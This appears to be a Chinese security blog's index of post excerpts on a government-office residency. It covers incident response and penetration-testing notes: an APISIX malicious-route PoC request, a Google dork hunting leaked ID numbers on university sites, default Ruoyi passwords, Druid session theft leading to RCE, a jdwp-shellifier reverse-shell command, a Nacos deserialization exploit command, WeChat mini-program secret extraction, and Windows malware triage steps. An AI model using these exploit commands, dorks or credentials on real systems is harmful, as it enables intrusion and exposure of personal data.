lan1ocのblog

事件背景最近在网信办驻场，大多数时候蛮闲的，基本就是搞文档，然后企业要复测，天天被骚扰麻了，就写exp给他们让他们自测，但是有安全事件就要出去应急。这不就接到一个通报，说是木马远控事件看通报文件，时间跨度是2025-09-15 12:45:12-2025-09-15...

poc`x写入恶意路由 1234567891011121314151617181920POST /apisix/admin/routes HTTP/1.1Host: Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9X-API-KEY: edd1c9f034335f136f87ad84b625c8f1{ ...

纯记录用用到ldap browser，连一下就行

google dorking看看身份证号泄露1site:edu.cn intext:身份证号 夏令营名单1https://*.edu.cn/system/_content/download.jsp?urltype=news.DownloadAttachUrl&owner=1216526319&wbfileid=3823090 初见端倪访问直接下载文件

说实话，懵了其实我真挺懵的，一开始是企业来扯皮嘛，我想着这种洞，能有啥难测的，然后测得时候，咋感觉，这是个未授权访问啊，越来越懵逼了 未授权访问与CORS访问的区别 特征 CORS配置漏洞 未授权访问 (Unauthorized Access) ​​漏洞性质​​ ​​配置错误​​：服务器响应头策略不当，浏览器放松限制 ​​权限控制缺失​​：服务端未对请求进行身份认证或鉴权 ​​关键表现​​ 服务器响应头反射了请求的Origin或使用通配符*，​​且允许凭据​​ 不携带任何认证信息（如Cookie、Token）也能访问敏感数据 ​​利用条件​​ 需要用户浏览器环境，依赖浏览器遵守CORS规则 无需浏览器环境，直接访问接口即可 ​​攻击目标​​ ​​窃取信息​​：利用用户身份读取敏感数据 ​​直接获取数据​​或执行未授权操作 ​​防御重点​​ 严格校验Origin头、避免凭据与通配符共用 加强接口的身份认证和权限校验 回到这个洞说实话，我觉得他两者都是啊，包未授权的，也包跨域的

纯记录用到手一个ruoyi-vue 弱口令admin:admin123ruoyi:123456 druid泄露的利用另一次领导派活，说是漏扫，但是能渗透就渗透了，就挂着公司产品扫了，然后看到有个druid未授权访问 测试接口未授权（URI监控）想着蛮默默看，点到uri监控测接口未授权拼接一般都是直接/prod-api/后面直接跟就行了，也有例外，比如这里的这些有带/wx/的，拼接的时候就得去掉，比如/wx/redmanage/personal/invoiceList，拼接的时候写/prod-api/wx/redmanage/personal/invoiceList是没有的，直接报错得/prod-api/redmanage/personal/invoiceList这样寄了，一个未授权访问都没有 凭证窃取（session监控）这里会记录近期的登录凭证（可用不可用的都会记录）直接爆破跑就行了，唉当时忘记记录了，后面是跑出个能用的session，然后成功进入了后台，定时任务rce了

扫端口探测取巧，直接根据之前的报告探测jdwp服务 利用1python2 jdwp-shellifier.py -t ip -p port --break-on "java.lang.String.indexOf" --cmd "bash -c {echo,base64编码的反弹shell命令}|{base64,-d}|{bash,-i}" 然后服务器上接收到shell

纯记录1java -jar NacosRce.jar url 7884 ""  Hessian 反序列化漏洞命令执行成功 

小程序位置新版微信不太一样，直接everything搜Applet 1%appdata%\Tencent\xwechat\radium\Applet\packages 然后运行一个小程序，这里就会有文件夹产生，如果运行一个就产生多个文件夹就找有__APP__.wxapkg的文件夹要反编译的就是__APP__.wxapkg 测试（用fine，反编译拿敏感信息）启动被测小程序，然后就会有文件夹生成直接用fine工具，配置好路径然后他就会自动进行提取敏感信息 信息泄露拿到appid和secret的利用方式接口调试工具直接获取token然后就是到运维中心操作就行

定位主机有安全设备直接根据告警的内网ip一键定位 无安全设备那通报给的ip包是公网统一出口ip，就得一台台电脑排查了 排查思路查看外联，定位pid->tasklist定位进程名->找路径->删除->持久化排查 查看外联，定位pid1netstat -ano | findstr ip 红框那一列就是pid tasklist定位进程名1tasklist /FI "PID eq 4992" 找路径任务管理器可以直接打开任务管理器找，在详细信息那里，找到后右键找路径 命令行cmd1wmic process where name="steam.exe" get ExecutablePath 或者 1dir C:\a.exe /s /b powershell1Get-Process steam | Select-Object...